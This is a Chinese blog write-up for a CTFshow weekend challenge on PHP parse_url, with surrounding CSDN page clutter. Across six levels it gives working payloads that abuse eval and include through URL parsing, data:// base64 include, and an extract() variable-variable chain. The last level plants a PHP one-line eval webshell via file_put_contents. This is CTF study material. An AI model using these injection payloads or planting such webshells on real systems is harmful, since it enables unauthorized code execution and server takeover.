CTFSHOW-_周末大挑战

最新推荐文章于 2024-07-31 11:01:16 发布
最新推荐文章于 2024-07-31 11:01:16 发布
阅读量179 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lzy15562159122/article/details/130666919
版权

由于图片传不上去就只能凑合看了

第一关

题目

 $data = parse_url($_GET['u']);
 ​
 eval($data['host']);

先看一下parse_url()这个函数:

参考博客:PHP:parse_url的用法和参数说明_one312的博客-CSDN博客v87control_2,239v2insert_chatgpt&utm_term=parse_url&spm=1018.2226.3001.4187

再分析一下这两行代码,执行url里的host,所以修改host就可以,因为/会被解析成url的一部分,所以用cd ..;绕过

payload:

 ?u=http://system("cd ..;cd ..;cd ..;tac flag_is_here.txt");

第二关

先看题目:

 $data = parse_url($_GET['u']);
 ​
 include $data['host'].$data['path'];

文件包含,这里使用base64的data协议进行命令执行,因为命令部分会被解析成query部分,如下图

 data://text/plain;base64,<?php phpinfo();?>

这里的命令需要base64进行加密

最终的payload:

 ?u=http://data:://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+

data后面有两个::至于为什么本地试试就知道了

但是这样并不能执行命令,试了试需要将payload进行url编码。

最终payload:

 http%3A%2F%2Fdata%3A%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCJ0YWMgL19mMWFnXzFzX2gzcmUudHh0Iik7ID8%2B

第三关

和上一关大同小异

 $data = parse_url($_GET['u']);
 ​
 include $data['scheme'].$data['path'];

本地测试一下:

最终payload,甚至不需要url编码:

 ?u=data:://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgL19mMWFfZ18xc19oM3JlIik7Pz4=

第四关

还是大同小异

附一张本地图片

最终payload:

?u=http://cd ..;cd ..;cd ..;tac 1_f1ag_1s_h3re/1

第五关

并不难,就是稍微套了点

extract(parse_url($_GET['u']));
include $$$$$$host;

附上本地测试代码

<pre>
<?php
$u = "user://pass:query@scheme:111/path?fragment#data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==";
$data = parse_url($u);
extract(parse_url($u));
echo "<br>";
print_r($data);
echo $host."<br>";
echo $scheme."<br>";
echo $user."<br>";
echo $pass."<br>";
echo $query."<br>";
echo $fragment."<br>";

echo $$$$$$host."<br>";

//$host ->  scheme
//$$host = schme -> user
//$$$host = user -> pass
//$$$$host = pass -> query
//$$$$$host = query -> fragment
//$$$$$$host = fragment -> 最终命令
?>
</pre>

附上测试结果

最终payload:

?u=user%3A%2F%2Fpass%3Aquery%40scheme%3A111%2Fpath%3Ffragment%23data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCJ0YWMgL19mMWFnXzFzX2gzcmVlIik7ID8%2B

第六关

第六关有个函数file_put_contents();

所以想到上传一句话木马

由于?会被解析成query,所以需要更换php标签,这里用的js,由于path中一定会有/,所以选择绝对路径上传,这里路径猜测默认路径

构造payload:

?u=//<script language="php"> eval($_POST['1']);/var/www/html/1.php

然后蚁剑访问1.php

根目录下拿到flag

Chu0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow周末挑战wp
qq_61955196的博客
05-13 277
本来要看政治的(卑微的周末考期末人),群主突然说有比赛就来玩玩看了。没想到ak了。这里就讲一下我的解题思路。
CTFSHOW_周末挑战
m0_59448417的博客
05-14 290
CTFSHOW_周末挑战
CTFshow-RCE极限大挑战wp
Leaf_initial的博客
04-10 438
开始限制长度了,105字符,但是可以用数字0或者1,那么就可以通过(0/0)来构造float型的NAN,(1/0)来构造float型的INF,然后转换成字符串型,得到"NAN"和"INF"中的字符了,payload构造过程,这里直觉上认为构造。以及类似的东西都是变量名称,在构造payload的过程就就是起到一个变量名的作用,类似于$a、$b,在然后在php中,如果强制连接数组和字符串的话,数组将被转换成字符串,例如在下列代码中。于是利用这一点,我们可以得出Array中的第一个字母A,然后利用自增来得到。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 656
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
CTFShow--周末挑战parse_url篇Writeup
Aluxian_的博客
05-15 677
【代码】CTFShow--周末挑战Writeup。
CTFShow--周末挑战parse_url篇Writeup_extract(parse_url($_post[‘shctf‘])); if($$$scheme=
2401_84281655的博客
05-12 980
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。
CTFShow-周末挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
RCE和php文件上传
m0_71332744的博客
07-30 751
在网络安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
53、PHP 实现归并排序
weixin_44010641的博客
07-30 261
【代码】53、PHP 实现归并排序。
WordPress原创插件:搜索引擎抓取首图seo图片
爱酷码的博客
07-29 447
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP框架详解 - symfony框架
丁爸的博客
07-28 1006
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
PHP一维数组怎么转关联数组
qq_32450471的博客
07-30 235
php是一门广泛应用于web开发的脚本语言。其强大的数组功能是其最重要的特征之一。在PHP中,数组是一个能够存储多个值的变量,并且这些值可以是任何类型的数据,比如整数、浮点数、字符串、布尔值、对象等等。此外,数组还可以分为索引数组和关联数组。本文主要介绍PHP中一维数组转关联数组的方法。
基于PHP+MySQL组合开发的微信活动投票小程序源码系统 带完整的安装代码包以及搭建部署教程
最新发布
codeji的博客
07-31 131
为了满足这一需求,我们推出了一款基于PHP+MySQL组合开发的微信活动投票小程序源码系统,旨在帮助用户快速搭建和管理投票活动。该系统采用了PHP作为后端开发语言,结合MySQL数据库进行数据存储和管理,确保了系统的稳定性和可扩展性。同时,通过优化数据库查询和索引设计,提高了数据处理的效率,确保了在大量用户同时参与投票时系统的稳定运行。同时,系统还支持多种交互方式,如分享、评论等,增强了用户的参与感和互动性。同时,管理员可以自定义投票选项、设定投票时间、限制投票次数等,确保活动的灵活性和公平性。
如何排查和解决PHP连接数据库MYSQL失败写锁的问题
qq_33665793的博客
07-30 782
并把此服务器加入到定期排查的服务器集合中,因此服务器当时是使用的分公司购买的,所以遗漏了。本文将介绍一些常见的排查步骤和解决方法,帮助开发者快速定位和解决PHP连接数据库失败的问题。首先,确保你的PHP代码中的数据库连接凭据(主机名、用户名、密码、数据库名)是正确的。- **Ping命令**:从Web服务器上执行ping命令,检查是否能够成功到达数据库服务器。- **数据库名错误**:确认连接时使用了正确的数据库名称。- **主机名错误**:确保使用正确的主机名或IP地址。
ctfshow-__萌新隐写
09-14
根据这些信息,我们可以得出结论,ctfshow-__萌新隐写也是CTFShow "萌心区"WP详解(上)中关于隐写的一道题目。 请注意,我无法提供具体的题目内容和解答,因为您没有提供更多细节。如果您需要更详细的答案,请提供...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值